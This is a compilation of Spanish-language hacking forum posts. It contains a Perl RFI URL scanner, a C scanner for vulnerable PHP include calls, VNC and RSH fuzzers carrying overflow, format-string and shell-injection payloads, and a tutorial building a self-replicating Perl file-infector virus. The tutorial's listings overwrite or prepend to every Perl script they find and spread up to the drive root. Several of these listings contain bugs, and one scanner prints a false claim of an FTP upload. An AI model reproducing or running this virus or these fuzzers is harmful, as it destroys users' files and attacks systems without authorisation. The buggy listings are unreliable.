open (arquivo,">$ark");
print arquivo $novo;
close(arquivo);
   $q=0;
   $w=0;
    @hot;
   open (ops,"<$caxe1");
   while(<ops>)
   {
   $hot[$q] = $_;
   chomp $hot[$q];
   $q++;
   $w++;
   }
   close(ops);
print "\t[ ComeiƒÆ'i,§ando o scan aguarde. Pode demorar horas. ]\n";
# A site is recorded when the probed URL's response contains all three of
# "root", "etc" and "boot" - a heuristic, not a confirmed include.
for($q=0;$q<=$w;$q++)
  {

  if ($hot[$q] =~/http/)
    {
   $tipo=get($hot[$q]) or next;
   if($tipo =~/root/)
         {
         if ($tipo =~/etc/)
          {
          if ($tipo =~/boot/)
           {
    open(a,">>res.txt");
    print a "$hot[$q]\n";
    close(a);
                 }}}}}}

print "\t[ Pronto scanner concluido ]\n";
# No FTP upload exists anywhere in this script; the only output is the
# local res.txt.
print "\t[ O resultado foi salvo no ftp do spykids ]\n";
Perl / RFI-Scanner
Enero 27, 2011, 08:53:05 PM
/*
   RFI Scanner By DiGitalX ([email protected])
   Date: 6/4/2007 -- MicroSystem Team
*/

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>

//#define _DEBUG //debug mode (for me :D)
#define DEBUG_ROOT "output"

//put the vuln functions here
//functions that if a var is in its arguments then possible RFI occurs
//IMPORTANT: keep this order
/* PHP functions whose argument may pull in a caller-controlled path.  The
 * original author insists on this order (the *_once names before their
 * shorter prefixes); php_scanfile() walks the list up to the NULL sentinel. */
char* vuln[] = {
   "include_once",
   "include",
   "require_once",
   "require",
   NULL
};

/* -s switch: name the file on each hit instead of printing a "Scanning"
 * line per file (read by php_search and php_scanfile). */
BOOL bShortDis = FALSE;

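/* Print the command-line syntax.
 *   app - argv[0], shown as the program name
 * The optional -s switch must precede the root directory (main() only looks
 * for it in argv[1]); the old text put it before the program name. */
void usage(char* app)
{
   printf("usage: %s [-s] <root-directory>\n", app);
   printf("\t-s\tshort display mode\n");
}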

/* Print the author/date banner; emitted once before any other output. */
void banner(void)
{
   puts("RFI Scanner By DiGitalX ([email protected])");
   puts("Date: 6/4/2007 -- MicroSystem Team\n");
}

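/*
 * Read one line from f into line (NUL-terminated, '\n' stripped).
 *   f    - open input stream
 *   line - destination buffer
 *   size - capacity of line in bytes; values below 2 yield FALSE at once
 * Returns FALSE once EOF is hit (whatever was read before it is still in
 * line, so the caller must process that final partial line) and TRUE
 * otherwise.  A line longer than size-1 bytes is split: the buffer comes
 * back full and the rest stays in the stream for the next call.  The old
 * code compared the counter with a hard-coded 1023 regardless of size and
 * silently dropped the byte that did not fit.
 */
BOOL freadline(FILE* f, char* line, int size)
{
   int b;
   int i = 0;

   if (size < 2)
      return FALSE;

   memset(line, 0, (size_t)size);

   for (;;) {
      b = fgetc(f);
      if (b == EOF)
         return FALSE;
      if (b == '\n')
         return TRUE;
      /* keep one byte for the NUL and push the unread byte back */
      if (i >= size - 1) {
         ungetc(b, f);
         return TRUE;
      }
      line[i++] = (char)b;
   }
}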

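/*
 * Return 1 when the lower-cased source line `lower` calls `fn` with a
 * variable in its argument, 0 otherwise.  Two PHP forms are recognised:
 *   fn ( ... )      - parenthesised: a '$' anywhere before the first ')'
 *   fn <ws> expr ;  - bare statement: a '$' anywhere before ';' or line end
 * Only the first occurrence of fn on the line is examined and a call whose
 * closing ')' sits on a later line is not seen (same limits as before).
 * A longer identifier such as "includes(" is rejected because neither '('
 * nor whitespace follows the name.
 */
static int call_has_var_arg(const char* lower, const char* fn)
{
   const char* p = strstr(lower, fn);
   const char* end;
   int ws = 0;

   if (p == NULL)
      return 0;

   p += strlen(fn);
   while (*p == ' ' || *p == '\t') {
      p++;
      ws++;
   }

   if (*p == '(') {
      end = strchr(p, ')');          /* argument list must close on this line */
      if (end == NULL)
         return 0;
   } else if (ws > 0 && *p != '\0' && *p != ';') {
      end = strchr(p, ';');          /* bare `include $file;` form */
      if (end == NULL)
         end = p + strlen(p);
   } else {
      return 0;
   }

   return memchr(p, '$', (size_t)(end - p)) != NULL;
}

/*
 * Scan one PHP source file and print "possible RFI at line: N" for every
 * line where an include/require call takes a variable (see vuln[] and
 * call_has_var_arg); in short-display mode the file name is appended.
 *   file - path of the file to scan
 * Returns FALSE when the file cannot be opened, TRUE after a complete scan.
 * Lines are read in pieces of at most 1023 bytes, so a call that spans a
 * piece boundary can be missed and line numbers count pieces.
 * The old version ended the loop body with a bare `next:` label, which is
 * not valid C before C23; the gotos are gone with it.
 */
BOOL php_scanfile(char* file)
{
   char line[1024];
   char lower[1024];
   int linenum = 0;
   int i;
   BOOL notend;
   FILE* f;

   f = fopen(file, "rb");
   if (f == NULL)
      return FALSE;

   do {
      /* FALSE means EOF: the bytes read before it still form a line to scan */
      notend = freadline(f, line, sizeof(line));
      linenum++;

      /* PHP keywords are case-insensitive, so match on a lower-cased copy */
      for (i = 0; line[i] != '\0'; i++)
         lower[i] = (char)tolower((unsigned char)line[i]);
      lower[i] = '\0';

      /* one report per line: stop at the first function that matches */
      for (i = 0; vuln[i] != NULL; i++) {
         if (call_has_var_arg(lower, vuln[i])) {
            printf("possible RFI at line: %d", linenum);
            if (bShortDis)
               printf(" in \"%s\"\n", file);
            else
               printf("\n");
            break;
         }
      }
   } while (notend);

   fclose(f);
   return TRUE;
}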

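/*
 * Recursively walk the current directory and run php_scanfile() on every
 * file whose name ends in ".php" (compared case-insensitively).  Each
 * sub-directory is entered with SetCurrentDirectory and left with "..".
 * Any name starting with '.' is skipped, which covers "." and ".." but
 * also dot-files and dot-directories.  Reparse points (junctions, symlinks)
 * are not entered, so a loop in the tree cannot recurse forever.
 */
void php_search(void) {
   WIN32_FIND_DATA wfd;
   HANDLE fh;
   char path[320];
   char* filePart;
   int len;

   fh = FindFirstFile("*.*", &wfd);
   if (fh == INVALID_HANDLE_VALUE)
      return;

   do {
      if (wfd.cFileName[0] == '.')
         continue;

      if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
         if (wfd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT)
            continue;
         /* the API only promises a nonzero result on success, so do not
          * compare against TRUE */
         if (SetCurrentDirectory(wfd.cFileName)) {
            php_search();
            SetCurrentDirectory("..");
         }
         continue;
      }

      if (GetFullPathName(wfd.cFileName, sizeof(path), path, &filePart) == 0)
         continue;
      CharLower(path);

      /* require the whole ".php" suffix: the old 3-byte "php" compare also
       * accepted names like "x.xphp" and indexed before the buffer for
       * names shorter than three characters */
      len = lstrlen(path);
      if (len >= 4 && memcmp(&path[len - 4], ".php", 4) == 0) {
         if (!bShortDis)
            printf("Scanning %s...\n", path);
         php_scanfile(path);
      }
   } while (FindNextFile(fh, &wfd));

   FindClose(fh);
}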

/*
 * Make `root` the current directory and scan everything beneath it.
 *   root - directory to scan; the walk in php_search() is relative to cwd
 * Returns FALSE when the directory cannot be entered, TRUE otherwise.
 */
BOOL begin_rfi_scan(char* root)
{
   if (SetCurrentDirectory(root) == 0)
      return FALSE;

   puts("Beginning Hunting RFI Vulnerabilities...");
   if (bShortDis)
      puts("Short Display Mode Activated");

   php_search();
   puts("Finished of Hunting.");

   return TRUE;
}

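/*
 * Entry point.  Syntax: <app> [-s] <root-directory>
 *   -s   short display mode: name the file on each hit instead of printing
 *        a "Scanning ..." line per file
 * With _DEBUG defined the root is DEBUG_ROOT and no argument is needed.
 * Returns 0 after a completed scan, 1 on a usage error or when the root
 * directory cannot be entered.
 */
int main(int argc, char** argv)
{
   int pos = 1;      /* argv index where the root directory is expected */
   char* root;

   banner();

   /* the switch is only recognised as the first argument; guard argv[1]
    * so that a run with no arguments cannot dereference NULL */
   if (argc > 1 && strcmp(argv[1], "-s") == 0) {
      bShortDis = TRUE;
      pos = 2;
   }

   #ifndef _DEBUG
   /* "-s" on its own used to pass argv[2] == NULL down to
    * SetCurrentDirectory; require the root after the optional switch */
   if (argc <= pos) {
      usage(argv[0]);
      return 1;
   }
   root = argv[pos];
   #else
   root = DEBUG_ROOT;
   #endif

   if (!begin_rfi_scan(root)) {
      printf("Error: initializing RFI Scanner... Try Again\n");
      return 1;
   }

   return 0;
}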

Es un simple scanner RFI que escanea archivos .php en busca de posibles funciones vulnerables como include(), require(), etc., y luego chequea si hay alguna variable en los argumentos de la función.
Si la hay, muestra el resultado para que tú chequees si hay una RFI/LFI, muy feliz xD!

*Nota:
Podés poner un montón de scripts PHP dentro de una carpeta y correr el scanner contra la misma.

El scanner escaneará todo el directorio root (indicado en la línea de comandos) y te proveerá cada posible función con bug junto con la línea y el nombre del script.
Perl / VNC Server Fuzzer
Enero 27, 2011, 08:51:38 PM
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# VNCrush - VNC Server Fuzzer
# How many more elaborate names for fuzzing tools can I come up with? Short answer: the imagination is limitless :)
# Some servers will throw out some of the fuzz strings, some won't ;)

use Net::VNC;
use Getopt::Std;

# FUZZ DATA BEGIN HERE
# Four fixed corpora, each fed in turn to the server's "depth" and "width"
# parameters below: long strings (length/overflow probes), printf-style
# format strings, numeric boundary values, and command-injection markers
# whose side effect (a file in /tmp, calc.exe) would show that input reached
# a shell.  No `use strict`: these are package globals.
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);

@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);

@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');

@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE

getopts('t:p:', \%opts);
$target = $opts{'t'};
$password = $opts{'p'};

if(!defined($target))
{
     print "\n VNCrush - VNC Server Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
     print "\n Usage: $0 -t <target> -p <password>\n\n";
     exit(0);

}

     print "\n VNCrush - VNC Server Fuzzer";
     print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";

     print "\nFuzzing VNC Server @ $target/$password... GOOD LUCK!\n";

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/overflow]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = depth/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth($fuzz);
$vnc->login; }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/overflow]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = width/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->width($fuzz);
$vnc->login; }

print "\n";
foreach(@overflows) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/overflow]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }
foreach(@fmtstring) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }
foreach(@numbers) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }
foreach(@miscbugs) { $fuzz = $_;
print "[Target = $target] [Fuzz = height/$fuzz]\n";
$vnc = Net::VNC->new({hostname => $target, password => $password});
$vnc->depth(24);
$vnc->height($fuzz);
$vnc->login; }

     print "\nFuzzing Complete. No faults? Try another server!\n\n";

exit;
#37
Perl / RSH Fuzzer
Enero 27, 2011, 08:51:20 PM
Código: perl
#!/usr/bin/perl
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# RSHatter - RSH Protocol Fuzzer
# ~Just for fun~

use Net::Rsh;
use Getopt::Std;

# FUZZ DATA BEGIN HERE
# Long runs of 'A' and a few repeated escape-like tokens; reported under the
# fixed label "overflow" in the progress line because they are huge.
@overflows = ('A' x 2200, 'A' x 4200, 'A' x 8400, 'A' x 12000, 'A' x 22000, 'A' x 52000, 'A' x 102000, 'A' x 500500,
       'A' x 1002000, 'A' x 5005000, 'A' x 12000000, '//AAAA' x 8500, '\\\AAAA' x 8500, '\0x99' x 12000);

# printf-style conversion sequences.
@fmtstring = ('%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x',
              '%s%p%x%d', '%.1024d', '%.1025d', '%.2048d', '%.2049d', '%.4096d', '%.4097d',
              '%99999999999s', '%08x', '%%20n', '%%20p', '%%20s', '%%20d', '%%20x',
              '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%', '\0xCD' x 50, '\0xCB' x 50);

# Boundary values around common integer widths, kept as strings.
@numbers = ('0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648',
              '4294967294', '4294967295', '4294967296', '357913942', '-357913942', '536870912', '-536870912',
              '1.79769313486231E+308', '3.39519326559384E-313', '99999999999', '-99999999999', '0x100', '0x1000',
              '0x3fffffff', '0x7ffffffe', '0x7fffffff', '0x80000000', '0xffff', '0xfffffffe', '0xfffffff', '0xffffffff',
              '0x10000', '0x100000', '0x99999999', '65535', '65536', '65537', '16777215', '16777216', '16777217', '-268435455');

# Shell metacharacter strings.
@miscbugs = ('test|touch /tmp/FU_ZZ_ED|test', 'test`touch /tmp/FU_ZZ_ED`test', 'test\'touch /tmp/FU_ZZ_ED\'test',
       'test;touch /tmp/FU_ZZ_ED;test', 'test&&touch /tmp/FU_ZZ_ED&&test', 'test|C:/WINDOWS/system32/calc.exe|test',
       'test`C:/WINDOWS/system32/calc.exe`test', 'test\'C:/WINDOWS/system32/calc.exe\'test', 'test;C:/WINDOWS/system32/calc.exe;test',
       'C:/WINDOWS/system32/calc.exe"', '`/bin/sh`', '%0xa', '%u000');
# FUZZ DATA END HERE

getopts('t:', \%opts);
$target = $opts{'t'};

# Two-line banner shared by the usage message and the run header.
sub print_banner {
    print "\n RSHatter - RSH Protocol Fuzzer";
    print "\nJeremy Brown [0xjbrown41\@gmail.com/jbrownsec.blogspot.com]\n";
}

unless (defined $target) {
    print_banner();
    print "\n Usage: $0 -t <target>\n\n";
    exit(0);
}

print_banner();
print "\nFuzzing RSHd @ $target... GOOD LUCK!\n";

# One test case.  The three arguments after the host (labelled localuser,
# remoteuser and cmd below) default to 'root', 'root', 'id'; the one at
# $position is replaced by the fuzz value.  A fresh Net::Rsh object is built
# for every case.
sub run_case {
    my ($slot, $position, $label, $fuzz) = @_;
    print "[Target = $target] [Fuzz = $slot/$label]\n";
    my @args = ('root', 'root', 'id');
    $args[$position] = $fuzz;
    $rshf = Net::Rsh->new();
    $rshf->rsh($target, @args);
}

# Per argument slot: a blank line, then overflows (labelled "overflow"), then
# format strings, numbers and misc strings, each echoed in the progress line.
for my $slot ([localuser => 0], [remoteuser => 1], [cmd => 2]) {
    my ($name, $position) = @$slot;
    print "\n";
    run_case($name, $position, 'overflow', $_) for @overflows;
    for my $list (\@fmtstring, \@numbers, \@miscbugs) {
        run_case($name, $position, $_, $_) for @$list;
    }
}

print "\nFuzzing Complete. RSHaattteeeerrrrr!\n\n";

exit;
#38
Perl / Tutorial - Perl virus
Enero 27, 2011, 08:49:24 PM
Autor: SnakeByte
Traducido: AspriX

Debido a que he tenido que aprender Perl para un trabajo, decidi escribir un virus en este lenguaje. Hasta esta mañana no he encontrado un virus hecho en perl en la web, asique decidi escribir este pequeño tutorial sobre virus en Perl. Este tuto tiene la misma estructura que mi tutorial sobre Virus Script en Linux y estoy seguro que los newbies en perl (como yo) lo entenderan. Por el momento no he mirado el virus que encontre, porque quiero tratar de escribir uno propio.
(recien termine un overwritter totalmente lamer, pero decidi empezar escribiendo esto, porque quiero que el lector siga mis pasos).
Todo el codigo que veran aqui esta testeado en un Linux SuSe 7.0 con Perl 5.0005_3 y funciono bien. Voy a tratar de hacerlo compatible con otros S.O. pero no puedo garantizarlo.
Bueno, vamos a empezar con el overwritter del que les hable. Primero el codigo y despues la explicacion de lo que hace:

Código: perl
#!/usr/bin/perl

open(File,$0);                 # $0 is the running script: it reads its own source
@Virus=<File>;                 # one element per source line
close(File);

foreach $FileName (<*>)        # every name in the current directory, no type check
{
  open(File, ">$FileName");    # '>' truncates: the target's original content is lost
  print File @Virus;
  close (File);
}


La primer linea es un comentario (marcado con #). Es casi un estandar que todos los archivos de perl tengan la ruta del interprete en la primera linea.
En la segunda linea nos abrimos a nosotros mismos. El nombre del archivo del script que esta corriendo se guarda en $0. En la tercera linea pasamos el contenido de nuestro archivo al array @Virus. Ahora, todos los valores del array (@Virus[1],@Virus[2],...) contienen una linea de nuestro archivo. Ya que esto es todo lo que queremos hacer con nuestro archivo lo cerramos.
Entonces usamos un loop para buscar archivos. Con el loop pasamos por todos los archivos del directorio actual (<*>) y copiamos su nombre en $FileName. Abrimos el archivo para escritura (mostrado como > delante del nombre del archivo) y simplemente escribimos nuestro virus sobre el archivo (si quisieramos añadirnos en vez de sobreescribirnos usariamos >>nombre_del_archivo). Bueno, el archivo fue reemplazado por el virus, asique agarremos al siguiente y hagamos lo mismo...
Pienso que este pedacito de codigo esta bastante claro ahora.
Hagamoslo un poco mejor, asi no sobreescribiremos todos los archivos, solo los de perl.

Código: perl
#!/usr/bin/perl
open(File,$0);                 # read the running script's own source into @Virus
@Virus=<File>;
close(File);

foreach $FileName (<*>)        # every name in the current directory
{
  if ((-r $FileName) && (-w $FileName) && (-f $FileName))   # readable, writable, regular file
  {
   open(File, "$FileName");
   @Temp=<File>;               # target contents, one element per line
   close(File);
   if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl"))   # case-sensitive "perl" on line 1 or 2
   {
    open(File, ">$FileName");  # overwrite the target with @Virus
    print File @Virus;
    close (File);
   }
  }
}


Las primeras lineas las vimos en el anterior ejemplo. Despues sigue un If enorme, veamos lo que hace.
Este filtra todos los archivos que somos capaces de leer (-r), de escribir (-w) y los que son archivos en si y no directorios (-f).
Cada una de estas condiciones debe cumplirse, ya que las juntamos con && que es un AND logico. Entonces abrimos el archivo para leer (como ves, no hay > adelante del nombre).
Copiamos el archivo entero en $Temp y lo cerramos. Entonces buscamos en la primer y segunda linea (@Temp[0] y @Temp[1]) por la palabra "perl" (Las mayusculas/minusculas no se ignoran, pero hasta ahora no encontre metodos de comparacion de strings que ignoren mayusculas/minusculas, pero seguire buscando), para ver si tenemos un archivo perl.  /*Nota del traductor: La frase del parentesis no la entendi muy bien, pero despues de pensar un rato estoy casi seguro que quiere decir eso ^^ */
El resto es como en el ejemplo anterior. Hay 2 cosas que podriamos agregar para buscar los archivos. La primera es ver si son ejecutables (if(-x $FileName)), pero como creo que no podemos chequear esto en Windows, y hay gente como yo que corren sus archivos perl con el interprete y no setean el flag 'ejecutable', no lo hare. La otra cosa que podriamos hacer es ver con el comando 'file' de Linux si el archivo es un script perl. Pero esto tampoco funcionara en Windows, asique no lo hare.
Bueno, creo que ya entendimos las bases. Ahora olvidemonos de esta mierda de overwritting y empecemos a hacer algo mas serio: prepending (añadidura?) /*Nota del autor: prepending=añadidura? Es añadir al principio, pero no supe si traducirlo asi o no*/

Código: perl
#!/usr/bin/perl
#PerlDemo                   # NEW -- line 2 carries the marker string checked below

open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...27];      # NEW -- fixed number of leading lines is the payload; comments here stay inline so the line count does not shift
close(File);

foreach $FileName (<*>)
{
  if ((-r $FileName) && (-w $FileName) && (-f $FileName))
  {
   open(File, "$FileName");
   @Temp=<File>;
   close(File);
   if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))  # NEW -- "PerlDemo" on line 2 or 3 is the infection marker
   {
    if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl"))          # "perl" on line 1 or 2, case-sensitive
    {
     open(File, ">$FileName");
     print File @Virus;
     print File @Temp;         # NEW -- the original file follows the payload
     close (File);
    }
   }
  }
}


Esta vez he marcado las lineas nuevas, porque no cambio mucho. El primer cambio es que obtenemos solo las primeras 24 lineas del archivo que esta corriendo (el infectado). Esto es porque tambien añadiremos el archivo original al que infectamos. El segundo cambio es que agregamos el archivo original al virus mientras infectamos. Entonces el nuevo archivo iniciara con el virus, despues una linea vacia y despues el archivo viejo, que empieza con #!/usr/bin/perl o lo que sea ;-)
Buscar "PerlDemo" sirve para ver si el archivo ya ha sido infectado por nosotros.
Normalmente empezaria a ver como se puede optimizar, pero aqui no podemos hacer mucho, juntar las lineas es lo unico que se me ocurre:

Código: perl
#!/usr/bin/perl #PerlDemo
open(File,$0); @Virus=<File>; @Virus=@Virus[0...6]; close(File);   # same prepender folded onto fewer lines; the slice bound tracks the listing's line count
foreach $FileName (<*>) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))   # marker still looked for on lines 2-3 of the target
{ if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus;
print File @Temp; close (File); } } } }


Esto nos salva de unos saltos de linea solamente y no esta tan bueno =P
Agreguemos algunas cosas que esten buenas para el virus, como viajar entre directorios. Primero lo haremos hacia abajo, echemos un vistazo:

Código: perl
#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...24];      # leading lines of the running script are the payload (comments kept inline: the slice is by line count)
close(File);

&InfectFile;                # NEW -- current directory
chdir('..');                # NEW -- then the parent; there is no chdir back
&InfectFile;                # NEW

sub InfectFile {            # NEW -- walk the current directory, prepend @Virus to matching regular files
  foreach $FileName (<*>) {
   if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
    open(File, "$FileName");
    @Temp=<File>;
    close(File);
    if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {           # "Virus" on line 2 or 3 is the infection marker
     if ((@Temp[0] =~ "perl",,i) or (@Temp[1] =~ "perl",,i)) {   # NEW -- the prose reads ",,i" as ignore-case; Perl parses it as a comma expression, not a regex flag
      open(File, ">$FileName");
      print File @Virus;
      print File @Temp;
      close (File);
}}}}}


Que hemos hecho? El primer cambio que vemos es que colocamos las
rutinas de busqueda de archivos y de infeccion en un sub, que llamamos
2 veces desde el main.
Otro cambio es chdir('..') que nos coloca un
directorio mas abajo. Esto tendria que funcionar bien en sistemas
Unix/Linux/DOS/Windows, pero no en MacOS, porque este usa '::'. Triste
pero verdadero, perl no es tan portable como quisieramos =P
Otro
cambio esta dentro de la busqueda de archivos (@Temp[1]= ~ "perl",,i).
,,i significa que buscaremos la cadena perl ignorando mayusculas y
minusculas, asique tambien encontraremos archivos perl que empiezen con
#C:\Programme\Perl\Perl.exe. El, llamemosle bug, de este virus es que
no podremos volver al directorio anterior. Este es otro problema
causado por la incompatibilidad entre los diferentes sistemas
operativos. En Unix/Linux podemos conseguir el directorio actual
haciendo $CurPath=`pwd`, pero esto no funcionaria en Windows o MacOS.
Afortunadamente podemos saber en que SO estamos corriendo con la
variable $^0, que existe desde Perl 5.0002. El codigo que sigue nos
dira si estamos corriendo en una maquina con DOS, Windows, Linux, BSD o
Solaris.

Código: perl
#!/usr/bin/perl
#Perl Virus - Downward Travelling
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...30];      # leading lines of the running script are the payload (slice is by line count, so comments stay inline)
close(File);

&InfectFile;                # current directory first
if (($^O =~ "bsd") or ($^O =~ "linux") or ($^O =~ "solaris")) { $OldDir = `pwd` }       # NEW -- $^O names the OS; remember the cwd via the shell
if (($^O =~ "dos") or ($^O =~ "MSWin32")) { $OldDir = `cd` }                            # NEW -- on DOS/Windows a bare 'cd' prints the cwd
$DotDot = '..';                                                                         # NEW -- parent-directory spelling
if ($^O =~ "MacOS") { $DotDot = "::" }                                                  # NEW -- classic MacOS uses '::'
chdir($DotDot);                                                                         # NEW
&InfectFile;                # then the parent
chdir($OldDir);                                                                         # NEW -- back to the saved directory

sub InfectFile {            # walk the current directory, prepend @Virus to matching regular files
  foreach $FileName (<*>) {
   if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
    open(File, "$FileName");
    @Temp=<File>;
    close(File);
    if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {   # "Virus" on line 2 or 3 is the infection marker
     if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {     # "perl" on line 1 or 2
      open(File, ">$FileName");
      print File @Virus;
      print File @Temp;
      close (File);
}}}}}


Bien, si el sistema es BSD, Linux o Solaris, conseguimos el directorio actual con el comando pwd, que es un comando comunmente usado que devuelve la ruta actual. En Windows lo hacemos con cd, que se usa para cambiar de directorio pero tambien sirve para conseguir la ruta actual. Entonces ponemos los dos puntos '..' como se usan en cualquier SO, excepto MacOS, asique ponemos '::' si estamos corriendo en una Mac. Tal vez seria mejor hacer 2 chequeos, uno para Mac y usar los dos puntos, uno para DOS, Windows y OS/2 para usar cd para obtener la ruta, y para todo lo demas usamos pwd para obtener la ruta, ya que hay muchas versiones de BSD y Unix en las que se soporta perl y en todas funciona el comando pwd.
Si quisieramos viajar hacia arriba tenemos el mismo problema: diferentes sistemas operativos=diferentes formas de expresar su directorio raiz. Linux tiene uno solo, /, Windows y DOS tienen uno para cada disco, A:, C:, D:, y por lo que se Mac no tiene ninguno. Con el siguiente code tratare te manejar esto problemas:

Código: perl
#!/usr/bin/perl
  # Perl - Get'em'all Virus
open(File,$0);
@Virus=<File>;
@Virus=@Virus[0...46];      # leading lines of the running script are the payload (slice is by line count, so comments stay inline)
close(File);

&InfectFile;                # current directory first
if ($^0 =~ "MacOS") {       # NOTE(review): written with a digit zero here; the tests below use $^O
  chdir('::');
  &InfectFile; }
else { if (($^O =~ "dos") or ($^O =~ "MSWin32")) {
  $OldDir = `cd`;           # save the cwd, then parent and drive root
  chdir('..');
  &InfectFile;
  chdir('C:\');
  &SearchUpperDirectorys;
  chdir($OldDir);}
else {
  $OldDir = `pwd`;
  chdir("/");
  &SearchUpperDirectorys;
  chdir($OldDir);}}

sub InfectFile {
  foreach $FileName (<*>) {
   if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
    open(File, "$FileName");
    @Temp=<File>;
    close(File);
    if ((@Temp[1] =~ "Virus") or (@Temp[2] =~ "Virus")) {
     if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) {
      open(File, ">$FileName");
      print File @Virus;
      print File @Temp;
      close (File);
}}}}}

sub SearchUpperDirectorys {
  foreach $Directory (<*>) {
   if ((-r $Directory) && (-w &Directory ) && (-d $Directory) {
    chdir ($Directory);
    &InfectFile;
    chdir ('..')
}}}


Bien, si estamos en MacOS hemos infectado el directorio mas bajo. Si estamos en DOS o Windows infectamos la carpeta mas abajo y empezamos a buscar por otras en C:\. Despues de eso volvemos al directorio antiguo. En todos los demas sistemas buscamos el raiz de estos. Despues volvemos al directorio original.
